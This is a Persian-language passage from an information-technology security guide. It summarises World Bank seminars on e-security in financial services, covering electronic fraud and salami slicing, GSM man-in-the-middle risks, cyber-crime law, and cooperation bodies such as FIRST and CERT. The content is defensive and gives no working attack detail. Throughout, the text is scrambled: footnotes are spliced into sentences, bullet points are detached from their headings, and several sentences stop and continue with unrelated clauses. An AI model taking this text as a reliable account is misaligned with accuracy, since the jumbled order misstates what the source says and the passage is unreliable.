ﺑﺮﻭﺯ ﻣﺸﻜﻼﺗﻲ ﻣﻲﺷﺪ ،ﭼﺮﺍﻛﻪ ﺍﻳﻦ ﺍﻣﺮ ۲۲۴ﻓﺎﻳﻞ ﻭﻳﺪﺋﻮﻳﻲ ﺧﻼﺻﺔ ﻣﺬﺍﻛﺮﺍﺕ ﻧﺸـﺴﺘﻬﺎﻱ ﺳـﺎﻟﻬﺎﻱ ۲۰۰۲ﻭ ۲۰۰۳ ﺍﺯ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ ﺑﺘﺮﺗﻴﺐ ﺑﺎ ﺁﺩﺭﺳﻬﺎﻱ ﺯﻳـﺮ ﻗﺎﺑـﻞ ﺩﺳﺘﺮﺳـﻲ ﻫﺴﺘﻨﺪ: http://www.worldbank.org/wbi/B-Span/sub_esecurity.htm http://www1.worldbank.org/finance ۲۲۵ﺍﻳﻦ ﺟﻠﺴﻪ ﺑﺎ ﺣﻀﻮﺭ ﺍﻋـﻀﺎﻱ ﮔـﺮﻭﻩ ﻳﻜﭙﺎﺭﭼـﻪﺳـﺎﺯﻱ ﺑﺎﻧـﻚ ﺟﻬـﺎﻧﻲ ﺑﺮﮔـﺰﺍﺭ ﺷﺪ .ﺍﻋﻀـﺎﻱ ﺣﺎﺿﺮ ﺩﺭ ﺟﻠﺴـﻪ ﻋﺒﺎﺭﺕ ﺑﻮﺩﻧﺪ ﺍﺯThomas : ،Tom Kellerman ،Glaessnerﻭ ،Valerie McNevin ﺑﻌﻼﻭﺓ ﺷﺮﻛﺖﻛﻨﻨﺪﮔﺎﻥ ﺩﺭ ﺍﻳﻦ ﺳﻤﻴﻨﺎﺭ ﺟﻬﺎﻧﻲ ﺍﺯ ﺍﺯ ﻛﺸﻮﺭﻫﺎﻱ ﺑﺮﺯﻳﻞ، ﺷﻴﻠﻲ ،ﻣﻜﺰﻳﻚ ،ﺍﻭﻛﺮﺍﻳﻦ ،ﺍﺳﻠﻮﻭﺍﻛﻲ ،ﺳﻨﮕﺎﭘﻮﺭ ،ﻛﺮﺓ ﺟﻨﻮﺑﻲ ،ﻓﻴﻠﻴﭙـﻴﻦ، ﻫﻨﮓﻛﻨﮓ ،ﺳﺮﻳﻼﻧﻜﺎ ،ﻭ ﺟﻤﻬﻮﺭﻱ ﺧﻠﻖ ﭼﻴﻦ 226 E-Risk ﻛﻼﻫﺒﺮﺩﺍﺭﻳﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑﺨـﺼﻮﺹ ﺩﺭ ﻧﻔﻮﺫﻫـﺎﻳﻲ ﻛـﻪ ﺍﺯ ﺍﺭﻭﭘﺎﻱ ﺷﺮﻗﻲ ﻋﻠﻴﻪ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺍﻧﺠـﺎﻡ ﻣـﻲ ﮔﻴـﺮﺩ ﻏﺎﻟﺒـﹰﺎ ﻳـﺎ ﺳﺮﻗﺖ ﻫﻮﻳﺖ ﻭ ﻳﺎ ﺍﺧﺎﺫﻱ ﺑﻮﺩﻩﺍﻧﺪ .ﺭﻭﺷﻬﺎﻱ ﺩﻳﮕﺮ ﻧﻴﺰ ﻋﺒﺎﺭﺗﻨـﺪ ﺍﺯ ،٢٢٧salami slicingﺍﻧﺘﻘــﺎﻝ ﺳــﺮﻣﺎﻳﻪ ،ﻭ ﺩﺳــﺘﻜﺎﺭﻱ ﺩﺭ ﺳــﻬﺎﻡ .ﺩﺭ ﺁﺳــﻴﺎ ،ﻧﻔﻮﺫﻫــﺎ ﻣﺘﻮﺟــﻪ ﺍﻫــﺪﺍﻑ ﻣــﺸﺨﺺ ﺑﺨــﺶ ﺍﻗﺘﺼﺎﺩﻱ ﻭ ﻫﻤﭽﻨﻴﻦ ﺍﻫﺪﺍﻑ ﺣﻴـﺎﺗﻲ ﺑﺨـﺸﻬﺎﻱ ﻓﻨـﺎﻭﺭﻱ ﺑـﻮﺩﻩ ﺍﺳﺖ. ﺑﺤـــﺚ ﻣﻘـــﺪﻣﺎﺗﻲ ﻣﺨـــﺎﻃﺮﺍﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـــﻲ ﺑـــﻪ ﻣﻮﺿـــﻮﻉ ﺁﺳﻴﺐ ﭘﺬﻳﺮﻳﻬﺎﻱ ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳﻴﻢ ﺑﺨـﺼﻮﺹ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ GSM ﻫﻢ ﭘﺮﺩﺍﺧﺖ .ﺑﻪ ﺩﻭ ﻧﻜﺘﺔ ﻛﻠﻴﺪﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﻣﺨﺎﻃﺮﺍﺕ ﻓﻨـﺎﻭﺭﻱ ﺑﻲﺳـﻴﻢ ﺍﺷـﺎﺭﻩ ﺷـﺪ ﻛـﻪ ﻋﺒـﺎﺭﺕ ﺑﻮﺩﻧـﺪ ﺍﺯ ﺁﺳـﻴﺐ ﭘـﺬﻳﺮﻳﻬﺎﻱ gatewayﻭ ﺣﻤـﻼﺕ " ."man in the middleﻣـﻮﺭﺩ ﺩﻭﻡ ﺑﻪ ﺍﻳﻦ ﺩﻟﻴﻞ ﺍﺗﻔﺎﻕ ﻣﻲﺍﻓﺘﺪ ﻛﻪ ﺑﺮﺟﻬﺎﻱ ﺗﻠﻔﻦ ﻫﻤﺮﺍﻩ ﻧﻤﻲﺗﻮﺍﻧﻨـﺪ ﻫﻮﻳﺖ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﺗﻠﻔﻨﻬﺎﻱ ﻫﻤﺮﺍﻩ ﺗﺼﺪﻳﻖ ﻛﻨﻨﺪ. 
ﻧﻜﺎﺗﻲ ﺩﺭ ﻣﻮﺭﺩ ﻗﻮﺍﻧﻴﻦ ﻭ ﺿﻮﺍﺑﻂ ﺩﺭﺣﺎﻟﻴﻜﻪ ﻗﻮﺍﻧﻴﻦ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﭘﻨﺞ ﺳﺎﻝ ﻗﺒﻞ ﭼﻨـﺪﺍﻥ ﻣﺮﺳﻮﻡ ﻧﺒﻮﺩﻧﺪ ،ﺍﻣﺮﻭﺯ ﭼﻬﻞ ﻛﺸﻮﺭ ﺩﺍﺭﺍﻱ ﺍﻳﻦ ﻗﻮﺍﻧﻴﻦ ﻫـﺴﺘﻨﺪ ﻭ ﺍﻳــﻦ ﺭﻗــﻢ ﻧﻴــﺰ ﺩﺭﺣــﺎﻝ ﺍﻓــﺰﺍﻳﺶ ﺍﺳــﺖ .ﻗــﻮﺍﻧﻴﻦ ﻣﺮﺑــﻮﻁ ﺑــﻪ ﻣﻌﺎﻣﻼﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺣﻘﻮﻕ ﻭ ﻣﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﻣﺼﺮﻑﻛﻨﻨـﺪﻩ ﺍﺯ ﺍﻫﻤﻴــﺖ ﺧﺎﺻــﻲ ﺑﺮﺧﻮﺭﺩﺍﺭﻧــﺪ ﻭ ﺑــﺴﺮﻋﺖ ﺩﺭﺣــﺎﻝ ﮔــﺴﺘﺮﺵ ﻣﻲﺑﺎﺷﻨﺪ .ﻣﻮﺿﻮﻋﺎﺕ ﻛﻠﻴﺪﻱ ﺍﻳﻦ ﺑﺤﺚ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ: ۲۲۷ﺑﺮﺩﺍﺷﺖ ﻣﻘﺎﺩﻳﺮ ﺑﺴﻴﺎﺭ ﻛﻢ ﺍﺯ ﺗﻌـﺪﺍﺩ ﺯﻳـﺎﺩﻱ ﺣـﺴﺎﺏ ﺑـﺎﻧﻜﻲ ﻣﺨﺘﻠـﻒ ﺑﺼﻮﺭﺕ ﻣﺘﻨﺎﻭﺏ ﺑﺨﺶ ﺳﻮﻡ ﻣﺜﺎﻟﻬــﺎﻳﻲ ﻛــﻪ ﺍﺯ ﺭﺧﻨــﻪﻫــﺎﻱ ﺍﻣﻨﻴﺘــﻲ ،ﺭﺍﻩﺣﻠﻬــﺎ ﻭ ﺳﻴﺎﺳــﺘﻬﺎﻱ ﻣﺒﺘﻜﺮﺍﻧﺔ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺁﻧﻬﺎ ﺩﺭ ﭘﻲ ﻣﯽﺁﻳﻨـﺪ ،ﺑﺮﮔﺮﻓﺘـﻪ ﺍﺯ ﺩﻭ ﺳـﻤﻴﻨﺎﺭ ﻫﺴﺘﻨﺪ ﻛﻪ ﺗﻮﺳﻂ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ ﺑﺮﮔﺰﺍﺭ ﺷﺪﻩﺍﻧﺪ -ﺳﻤﻴﻨﺎﺭ ﺍﻭﻝ ﺑﺎ ﻋﻨﻮﺍﻥ "ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ :ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﻩ ﺩﺭ ﺣـﻮﺯﺓ ﺧـﺪﻣﺎﺕ ﻣﺎﻟﯽ" ﺩﺭ ۲۵ﺳﭙﺘﺎﻣﺒﺮ ،۲۰۰۲ﻭ "ﺍﻳﻤﻨﻲ ﻭ ﺟﺎﻣﻌﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ" ﺩﺭ ۱۰ﺳــﭙﺘﺎﻣﺒﺮ .۲۰۰۳ﻓﻴﻠﻤﻬــﺎﯼ ﻭﻳــﺪﺋﻮﻳﻲ ﻫــﺮ ﺩﻭ ﺟﻠــﺴﻪ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭ ﺩﺳـﺘﺮﺱ ﻗـﺮﺍﺭ ﺩﺍﺭﺩ ٢٢٤.ﺍﻳـﻦ ﻓـﺼﻞ ﺷـﺎﻣﻞ ﻧﻜﺎﺕ ﻣﻬﻢ ﺍﻳﻦ ﺳﻤﻴﻨﺎﺭﻫﺎ ﻭ ﺗﻮﺿﻴﺤﺎﺕ ﻧﻤﺎﻳﻨـﺪﮔﺎﻥ ﻛـﺸﻮﺭﻫﺎﻱ ﺷﺮﻛﺖﻛﻨﻨﺪﻩ ﺍﺳﺖ. ﻣﻲﺗﻮﺍﻧﺴﺖ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﺭﺍ ﺗﺎ ﻣﺪﺗﻬﺎ ﻣﺎﻧﺪﮔﺎﺭ ﻛﻨﺪ .ﺑﺮﺍﻱ ﺑﺎﻧﻜﻬﺎ، ﻧﻪﺗﻨﻬﺎ ﺗﻬﺪﻳﺪﺍﺗﻲ ﭼﻨـﺪﻭﺟﻬﻲ ﻣﺜـﻞ Code Redﻭﺟـﻮﺩ ﺩﺍﺭﺩ، ﺑﻠﻜﻪ ﺧﻄﺮ ﺣﻠﻘﻪﻫﺎﻱ ﺟﺮﺍﺋﻢ ﺳﺎﺯﻣﺎﻧﻴﺎﻓﺘﺔ ﻧﻔﻮﺫ ﻧﻴﺰ ﻣﺤﺘﻤﻞ ﺍﺳﺖ. ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳﻦ ﺣﻠﻘـﻪﻫـﺎﻱ ﻋﻤﻠﻴـﺎﺕ ﻣﺠﺮﻣﺎﻧـﻪ ﺍﺯ ﻛﺎﺯﻳﻨﻮﻫـﺎﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺑﻌﻨﻮﺍﻥ ﺍﺑﺰﺍﺭ ﭘﻮﻟﺸﻮﻳﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ .ﻃﺒﻖ ﺗﺨﻤـﻴﻦ ﺷﺮﻛﺖ ،Internet Dataﺣﺪﻭﺩ %۵۷ﻧﻔﻮﺫﻫـﺎ ﻋﻠﻴـﻪ ﺻـﻨﺎﻳﻊ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺍﻧﺠﺎﻡ ﮔﺮﻓﺘﻪ ﺍﺳﺖ .ﻋﻼﻭﻩ ﺑﺮ ﺍﻳـﻦ ،ﺑـﻪ ﻣـﻮﺍﺯﺍﺕ ﭘﻴﭽﻴﺪﻩﺗﺮ ﺷﺪﻥ ﺭﻭﺷﻬﺎﻱ ﻧﻔﻮﺫ ،ﺳﻄﺢ ﻣﻬﺎﺭﺕ ﻧﻔﻮﺫﮔﺮﺍﻥ ﻛﺎﻫﺶ ﻣﻲ ﻳﺎﺑﺪ؛ ﭼﻮﻥ ﺗﻜﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺧﺮﺍﺑﻜﺎﺭﺍﻧﻪ ﺑﺮﺍﻱ downloadﻭ ﻛﺎﺭﺑﺮﺩ ،ﺩﺭ ﺩﺳﺘﺮﺱ ﻫﻤﮕﺎﻥ ﻗﺮﺍﺭ ﺩﺍﺭﺩ .ﺣﺘـﻲ ﻛـﺴﺎﻧﻴﻜﻪ ﺩﺍﻧـﺶ ﭼﻨﺪﺍﻥ ﻋﻤﻴﻘﻲ ﻧﺪﺍﺭﻧﺪ ﻧﻴﺰ ﺑﺎ ﺍﻳﻦ ﺍﻣﻜﺎﻧﺎﺕ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺍﻗـﺪﺍﻡ ﺑـﻪ ﻧﻔﻮﺫﻫﺎﻱ ﺑﺰﺭﮒ ﻛﻨﻨﺪ. ٢١٦ • • • • • ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺍﻋﺘﺒﺎﺭ ﺍﻣﻀﺎﻫﺎ ﻭ ﻣﻌﺎﻣﻼﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ؛ ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﺷﺨـﺼﻲ ،ﻭ ﺍﻋـﻼﻡ ﺭﺍﻫﺒﺮﺩﻫـﺎﻱ ﺍﺟﺮﺍﻳﻲ ﺍﺳﺘﻔﺎﺩﺓ ﺍﻳﻤﻦ ﺍﺯ ﺍﻃﻼﻋﺎﺕ؛ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺍﻣــﻦ ﭘﺮﺩﺍﺧــﺖ ﻣﻴــﺎﻥ ﺑﺎﻧﻜﻬــﺎ ﺑﺨــﺼﻮﺹ ﺑﺎﻧﻜﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ؛ ﭘﻮﻟــﺸﻮﻳﻲ ﻭ ﺳــﻄﺢ ﻫﻤﻜــﺎﺭﻱ ﺑــﻴﻦ ﺍﻟﻤﻠﻠــﻲ ﻛــﻪ ﺑــﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺁﻥ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺍﺳﺖ؛ ﻭ ﺗﻮﺳﻌﻪ ﻗﻮﺍﻧﻴﻦ ﺟﺮﺍﺋﻢ ﺳﺎﻳﺒﺮ ،ﻛﻪ ﻣﻘﻮﻟﺔ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﺍﻳﺎﻧـﻪ ﺩﺭ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﺠﺮﻣﺎﻧﻪ ﺭﺍ ﻧﻴﺰ ﺩﺭ ﺑﺮ ﺑﮕﻴﺮﺩ. 
• ﻣﻤﻴﺰﻱ ﻭ ﺁﺯﻣﻮﻥ ﻓﺮﺁﻳﻨﺪﻫﺎ .ﺑﺮﺍﻱ ﺗـﺴﺮﻳﻊ ﺭﻓـﻊ ﻭ ﺭﺟـﻮﻉ ﻛﺎﺭﻫﺎ ﺑﺎﻳﺪ ﻫﻤﻜﺎﺭﻱ ﻭﺳﻴﻌﻲ ﻣﻴﺎﻥ ﻫﻤﺔ ﻃﺮﻓﻬﺎﻱ ﺩﺭﮔﻴـﺮ ﺍﻧﺠﺎﻡ ﮔﻴﺮﺩ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺑﺎﻧﻜﻬﺎﻱ ﺍﺗﺤﺎﺩﻳﺔ ﺍﺭﻭﭘـﺎ ﺩﺍﺭﺍﻱ ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﻫﺎﻳﻲ ﺩﺭ Antiguaﻫــﺴﺘﻨﺪ .ﺍﮔــﺮ ﺍﻳــﻦ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﺍﺯ ﻛﺎﺭ ﺑﻴﺎﻓﺘﻨﺪ ،ﺑﺎﻧﻚ ﻫﻢ ﻗﺎﺩﺭ ﺑﻪ ﺍﺭﺍﺋـﻪ ﺧﺪﻣﺎﺕ ﻧﺨﻮﺍﻫﺪ ﺑﻮﺩ ،ﻭ ﺍﮔﺮ ﻫﻤﻜﺎﺭﻳﻬـﺎﻱ ﻓﺮﺍﺑﺨـﺸﻲ ﺑـﺎ ﻣﺸﻜﻞ ﻣﻮﺍﺟﻪ ﺷﻮﺩ ،ﺍﻗﺪﺍﻣﺎﺕ ﻓﻮﺭﻳﺘﻲ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨـﻪ ﺑـﻪ ﺗﻌﻮﻳﻖ ﻣﻲﺍﻓﺘﺪ. • ﻫﻤﻜــﺎﺭﻱ ﺩﻭﻟــﺖ ﻭ ﺑﺨــﺶ ﺧــﺼﻮﺻﻲ .ﻣﻤﻜــﻦ ﺍﺳــﺖ ﻣﺨﺎﻃﺮﺍﺗﻲ ﻛﻪ ﺑﺮﺍﻱ ﺳﺎﺯﻣﺎﻥ ﺟﻨﺒﺔ ﺣﻴﺜﻴﺘﻲ ﺩﺍﺭﻧﺪ ﻣﻨﺠـﺮ ﺑﻪ ﺧﻮﺩﺩﺍﺭﻱ ﺍﺯ ﮔﺰﺍﺭﺵ ﻛﺮﺩﻥ ﺣﻮﺍﺩﺙ ﺷـﻮﻧﺪ .ﺩﺭﻧﺘﻴﺠـﻪ ﺑﺮﮔﺰﺍﺭﻱ ﻣﻴﺰﮔﺮﺩﻫـﺎﻳﻲ ﺑـﺮﺍﻱ ﺑﺤـﺚ ﭘﻴﺮﺍﻣـﻮﻥ ﺿـﻮﺍﺑﻂ ﻗﺎﻧﻮﻧﻲ ﻭ ﺗﻬﺪﻳـﺪﻫﺎﻱ ﻣﻮﺟـﻮﺩ ﺿـﺮﻭﺭﻱ ﺍﺳـﺖ .ﺑﻌﻨـﻮﺍﻥ ﻣﺜﺎﻟﻬــﺎﻳﻲ ﺍﺯ ﻫﻤﻜــﺎﺭﻱ ﻭ ﺷــﺮﺍﻛﺖ ﻋﻤﻠﻴــﺎﺗﻲ ﺑﺨــﺶ ﺧﺼﻮﺻﻲ ﻭ ﺩﻭﻟﺖ ﻣـﻲﺗـﻮﺍﻥ ﺍﺯ ﻣﺆﺳـﺴﺔ InfraGard NIPCﻧﺎﻡ ﺑﺮﺩ ،ﻛـﻪ ﻣﺤـﺼﻮﻝ ﻳـﻚ ﻫﻤﻜـﺎﺭﻱ ﻣﻴـﺎﻥ ﻲ ﺻﻨﻌﺖ ﻭ ﺩﻭﻟﺖ ﺍﻳﺎﻻﺕ ﻣﺘﺤـﺪﻩ ﺑـﻮﺩ ﻭ ﺑﺨﺶ ﺧﺼﻮﺻ ﹺ ﺗﻮﺳﻂ FBIﻧﻤﺎﻳﻨﺪﮔﻲ ﻣﻲﺷﺪ .ﺷـﻜﻞ ﺩﻳﮕـﺮ ﺍﻳـﻦ ﻧـﻮﻉ ﻫﻤﻜﺎﺭﻱ ﺑﺎ ﻧﺎﻡ ٢٢٨FIRSTﻣﻴﺎﻥ ﺗﻌـﺪﺍﺩﻱ ﺍﺯ ﺗﻴﻤﻬـﺎﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧـﺔ ﺑﺨـﺶ ﺩﻭﻟﺘـﻲ ،ﺍﻗﺘـﺼﺎﺩﻱ ﻭ ﺩﺍﻧـﺸﮕﺎﻫﻲ ﺗﺸﻜﻴﻞ ﺷﺪﻩ ﺍﺳﺖ .ﺍﻫﺪﺍﻑ FIRSTﺍﻳﺠﺎﺩ ﻫﻤﺎﻫﻨﮕﻲ ﻭ ﻫﻤﻜﺎﺭﻱ ﺑﺮﺍﻱ ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﻣﺨﺎﻃﺮﺍﺕ ،ﻭﺍﻛﻨﺶ ﺳـﺮﻳﻊ ﺑﻪ ﺣﻮﺍﺩﺙ ﺍﻣﻨﻴﺘﻲ ﻭ ﺗـﺮﻭﻳﺞ ﺍﺷـﺘﺮﺍﻙ ﺍﻃﻼﻋـﺎﺕ ﻣﻴـﺎﻥ ﻛﺎﺭﺑﺮﺍﻥ ﺩﺭ ﺳﻄﻮﺡ ﻭﺳﻴﻊ ﻋﻨـﻮﺍﻥ ﺷـﺪﻩ ﺍﺳـﺖ .ﺍﺯ ﺩﻳﮕـﺮ ﻣﺜﺎﻟﻬــﺎ ﺩﺭ ﺍﻳــﻦ ﺯﻣﻴﻨــﻪ ﻣــﻲﺗــﻮﺍﻥ ﺑــﻪ ﭘﻴﻤــﺎﻥ ﺍﻣﻨﻴ ـﺖ ﺍﻳﻨﺘﺮﻧﺖ ٢٢٩ﻭ ﻣﺮﻛﺰ ﻓﻮﺭﻳﺘﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ )(CERT ﺍﺷﺎﺭﻩ ﻛﺮﺩ ،ﻛﻪ ﻣﺤﺼﻮﻝ ﻳﻚ ﻫﻤﻜﺎﺭﻱ ﻣـﺸﺘﺮﻙ ﻣﻴـﺎﻥ ﻲ CERTﺩﺭ ﺩﺍﻧـﺸﮕﺎﻩ Carnegie ﻣﺮﻛﺰ ﺑـﻴﻦﺍﻟﻤﻠﻠـ ﹺ Mellonﻭ ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﺷﺮﻛﺘﻬﺎﻱ ﺑﻴﻦ ﺍﻟﻤﻠﻠﻲ ﻏﻴﺮﺩﻭﻟﺘـﻲ ﺍﺳﺖ. 
• ﺍﻣﻨﻴــﺖ ﭼﻨﺪﻻﻳــﻪ .ﻣﻬﻤﺘــﺮﻳﻦ ﺭﺍﻫﻜــﺎﺭ ﺍﻣﻨﻴــﺖ ﻓﻨــﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ،ﺷﻴﻮﺓ ﭼﻨﺪﻻﻳﻪ ﺍﺳﺖ ﻛـﻪ ﺩﺭ ﺁﻥ ﺍﻳﻤﻨـﻲ ﺗﻨﻬـﺎ ﺗﻮﺳﻂ ﻓﻨﺎﻭﺭﻱ ﺗﺄﻣﻴﻦ ﻧﻤﻲﺷﻮﺩ ،ﺑﻠﻜﻪ ﺍﻓـﺮﺍﺩ ﻭ ﻓﺮﺁﻳﻨـﺪﻫﺎ ﻧﻴﺰ ﺩﺭ ﺁﻥ ﻧﻘﺶ ﻋﻤﺪﻩﺍﻱ ﺩﺍﺭﻧﺪ .ﺍﻋﺘﻤﺎﺩ ﺑﻴﺶ ﺍﺯ ﺣـﺪ ﺑـﻪ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺍﺭﺯﺷﻤﻨﺪﻱ ﭼﻮﻥ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻟﺰﻭﻣﹰﺎ ﺳﺎﺯﻣﺎﻥ ﺭﺍ ﺍﺟﺮﺍﻱ ﺻﺤﻴﺢ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﻧﻴﺎﺯﻣﻨﺪ ﭘﺬﻳﺮﺵ ﺿﻮﺍﺑﻂ ﺗﻮﺳﻂ ﻋﻤﻮﻡ، ﺩﺳﺖ ﻛﺸﻴﺪﻥ ﺍﺯ ﺗﻜـﺮﻭﻱ ﻭ ﻳﻜـﻪﺗـﺎﺯﻱ ،ﻭ ﺑـﺎﻻ ﺑـﻮﺩﻥ ﺩﺍﻧـﺶ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﺍﻥ ﺍﺳﺖ .ﺩﺭﺣﺎﻟﻴﻜﻪ ﺍﺯ ﻗﺒﻞ ﻣﻴـﺎﻥ ﺻـﻨﺎﻳﻊ ﻣﺘﻔـﺎﻭﺕ ﺩﺭ ﺳﻄﻮﺡ ﻣﺨﺘﻠﻒ ﻫﻤﻜـﺎﺭﻱ ﻭﺟـﻮﺩ ﺩﺍﺷـﺘﻪ ،ﺍﻣﻨﻴـﺖ ﭘﺮﺩﺍﺧﺘﻬـﺎﻱ ﻼ ﺑـﻪ ﺗـﺪﺍﺧﻞ ﺑﺨـﺸﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺯ ﻣﻮﺍﺭﺩﻱ ﺍﺳﺖ ﻛﻪ ﻛـﺎﻣ ﹰ ﻣﺨﺎﺑﺮﺍﺕ ﻭ ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻧﺠﺎﻣﻴﺪﻩ ﺍﺳﺖ .ﺻﻨﻌﺖ ﺑﺎﻧﻜﻲ ﺷﺎﺧﺼﻬﺎﻱ ﺍﻣﻨﻴﺖ ﻭ ﺻﺤﺖ ﺭﺍ ﺗﺤﺖ ﻋﻨﻮﺍﻥ "ﺩﺳﺘﺮﺳﻲ ﺑـﺪﻭﻥ ﺗﺒﻌـﻴﺾ ﺑـﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻗﺘﺼﺎﺩﻱ ﺳﺎﻟﻢ ﻭ ﺍﻣـﻦ" ﺗﻌﺮﻳـﻒ ﻛـﺮﺩ ،ﻭ ﺍﺯ ﻃـﺮﻑ ﺩﻳﮕﺮ ﺁﺭﻣﺎﻥ ﺻﻨﻌﺖ ﻣﺨﺎﺑﺮﺍﺕ "ﺩﺳﺘﺮﺳـﻲ ﻫﻤﮕـﺎﻧﻲ ﺑـﺮ ﺍﺳـﺎﺱ ﻋﻼﻗــﻪ ﻭ ﺭﻓــﺎﻩ ﻋﻤــﻮﻣﻲ" ﺑــﻮﺩ .ﺍﻳﻨﮕﻮﻧــﻪ ﺗﻌــﺎﺭﻳﻒ ﻣﺘﻔــﺎﻭﺕ ﺍﺯ "ﺧﺪﻣﺎﺕ ﺍﻣﻦ" ،ﺳﺎﺯﻣﺎﻧﻬﺎ ﺭﺍ ﺑﺮﺍﻱ ﺍﻳﻤﻦﻛﺮﺩﻥ ﺷﺒﻜﻪﻫﺎ ﻭ ﺩﺭﻧﻈـﺮ ﮔﺮﻓﺘﻦ ﻧﻴﺎﺯﻫﺎﻱ ﺍﻗﺘـﺼﺎﺩﻱ ﺑـﺼﻮﺭﺕ ﻫﻤﺰﻣـﺎﻥ ،ﺩﭼـﺎﺭ ﻣـﺸﻜﻞ ﻣﻲﻛﻨﺪ. ﻧﻈﺎﺭﺕ ﻭ ﭘﻴﺸﮕﻴﺮﻱ ﺑﺎ ﻭﺟﻮﺩ ﻣﺸﻜﻼﺕ ﻓﺮﺍﻭﺍﻥ ﭘـﺮﺩﺍﺧﺘﻦ ﺑـﻪ ﻧﻴﺎﺯﻣﻨـﺪﻳﻬﺎﻱ ﺩﻭﮔﺎﻧـﺔ ﺍﻣﻨﻴﺖ ﻭ ﺻﺤﺖ ،ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻳـﻚ ﻧﻴـﺎﺯ ﺣﻴـﺎﺗﻲ ﺑـﺮﺍﻱ ﺑﻴﺸﺘﺮ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺍﺳﺖ ﻭ ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﻛـﺎﻫﺶ ﻣﺨـﺎﻃﺮﺍﺕ ﻋﻤﻠـﻲ، ﻗــﺎﻧﻮﻧﻲ ﻭ ﺣﻴﺜﻴﺘــﻲ ﺩﺭ ﻣﺤــﻴﻂ ﻓﻨــﺎﻭﺭﻱ ﺍﻃﻼﻋــﺎﺕ ،ﺗــﻼﺵ ﻭ ﻫﻤﺎﻫﻨﮕﻲ ﺯﻳﺎﺩﻱ ﺻﻮﺭﺕ ﭘﺬﻳﺮﺩ .ﻃﺮﺣﻬﺎﻳﻲ ﻛﻪ ﺑـﺮﺍﻱ ﺍﻓـﺰﺍﻳﺶ ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻤﻬﺎ ﺩﺍﺩﻩ ﻣﻲﺷﻮﻧﺪ ﺑﺎﻳﺪ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﺭﺍ ﺩﺭ ﺑﺮ ﺑﮕﻴﺮﻧﺪ: • ﺁﻣﻮﺯﺵ ،ﺁﮔـﺎﻫﻲ ﻭ ﻳـﺎﺩﮔﻴﺮﻱ ﻣﻬـﺎﺭﺕ .ﺗﺤﻘﻴـﻖ ﺑﺎﻧـﻚ ﺟﻬﺎﻧﻲ ﻧﺸﺎﻥ ﻣﻲ ﺩﻫﺪ ﻛﻪ ﺣﺪﻭﺩ %۵۰ﻧﻔﻮﺫﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻧﺎﺷﻲ ﺍﺯ ﺗﻬﺪﻳﺪﻫﺎﻱ ﺩﺍﺧﻠﻲ ﻫﺴﺘﻨﺪ .ﺍﮔﺮ ﺍﺟﺮﺍﻱ ﻧﺎﺩﺭﺳـﺖ ﻲ ﺭﺍﻳﺎﻧﻪ ﺭﺍ 